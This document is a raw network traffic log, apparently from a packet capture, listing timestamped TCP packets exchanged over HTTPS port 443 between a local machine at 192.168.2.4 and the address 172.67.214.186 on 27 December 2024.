                                                                                                                                      Dec 27, 2024 10:21:56.414575100 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.414675951 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.414691925 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.414748907 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.420449972 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.420464993 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.420547962 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.420567036 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.420615911 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.426533937 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.426548958 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.426634073 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.426650047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.426692009 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.431809902 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.431826115 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.431900024 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.431915045 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.431960106 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.437423944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.437441111 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.437540054 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.437556982 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.437602997 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.443309069 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.443329096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.443419933 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.443438053 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.443484068 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.449237108 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.449254036 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.449314117 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.449331999 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.449379921 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.610814095 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.610840082 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.610920906 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.610946894 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.611001968 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.615956068 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.615972042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.616056919 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.616070986 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.616122007 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.621819973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.621835947 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.621901035 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.621915102 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.621965885 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.627794027 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.627810955 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.627881050 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.627895117 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.627943039 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.633045912 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.633060932 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.633136034 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.633150101 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.633198977 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.639374018 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.639389038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.639453888 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.639467955 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.639513016 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.644649029 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.644665003 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.644735098 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.644750118 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.644797087 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.650548935 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.650563002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.650624990 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.650639057 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.650690079 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.812051058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.812071085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.812119961 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.812155962 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.812180996 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.812200069 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.817320108 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.817337036 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.817406893 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.817424059 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.817471027 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.823208094 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.823225021 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.823297024 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.823328018 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.823383093 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.829217911 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.829233885 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.829308033 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.829339027 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.829385996 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.834417105 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.834433079 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.834501028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.834517002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.834570885 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.840789080 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.840802908 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.840858936 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.840874910 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.840904951 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.840924978 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.846133947 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.846149921 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.846210957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.846225977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.846275091 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.852072954 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.852087975 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.852155924 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.852170944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.852216959 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.013411999 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.013427973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.013515949 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.013540983 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.013600111 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.019373894 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.019390106 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.019464970 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.019480944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.019536018 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.024595022 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.024612904 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.024683952 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.024698019 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.024746895 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.030575991 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.030591011 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.030662060 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.030675888 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.030725956 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.036470890 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.036489010 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.036562920 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.036576033 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.036628962 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.042206049 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.042221069 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.042305946 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.042321920 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.042376041 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.048058033 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.048075914 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.048145056 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.048160076 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.048207998 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.053332090 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.053349018 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.053421021 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.053436041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.053487062 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.215293884 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.215327978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.215384007 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.215411901 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.215437889 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.215456963 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.220561981 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.220577955 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.220658064 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.220688105 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.220741987 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.226592064 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.226608038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.226680040 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.226695061 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.226744890 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.232476950 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.232492924 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.232562065 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.232577085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.232640028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.238464117 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.238480091 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.238550901 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.238564968 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.238619089 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.244069099 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.244083881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.244153023 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.244168997 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.244218111 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.249356985 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.249375105 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.249443054 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.249458075 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.249509096 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.255337000 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.255351067 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.255439043 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.255454063 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.255498886 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.416824102 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.416841030 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.416913986 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.416935921 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.416987896 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.422822952 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.422838926 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.422908068 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.422923088 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.422971964 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.428189039 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.428205013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.428277016 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.428292036 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.428338051 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.433996916 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.434015989 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.434062958 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.434077978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.434103966 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.434120893 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.439969063 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.439984083 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.440071106 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.440085888 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.440134048 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.445545912 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.445559978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.445636034 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.445651054 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.445692062 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.451553106 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.451569080 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.451643944 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.451661110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.451705933 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.456840038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.456855059 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.456929922 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.456948042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.456996918 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.618330002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.618347883 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.618525982 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.618551970 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.618608952 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.623605013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.623620987 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.623703957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.623718977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.623770952 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.629667044 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.629688025 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.629764080 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.629779100 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.629827976 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.635485888 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.635500908 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.635571957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.635586977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.635637999 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.640818119 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.640835047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.640911102 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.640940905 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.640986919 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.647109985 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.647125006 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.647196054 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.647208929 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.647258043 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.652349949 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.652364969 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.652436018 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.652451038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.652499914 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.658344984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.658361912 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.658444881 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.658457994 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.658504009 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.820131063 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.820147991 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.820219994 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.820255041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.820278883 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.820303917 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.826054096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.826077938 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.826127052 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.826143026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.826169968 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.826189041 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.831322908 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.831340075 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.831408024 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.831422091 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.831448078 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.831471920 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.837371111 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.837383986 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.837464094 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.837481022 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.837529898 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.842927933 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.842946053 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.843018055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:57.843035936 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:57.843064070 CET49745443192.168.2.4172.67.214.186
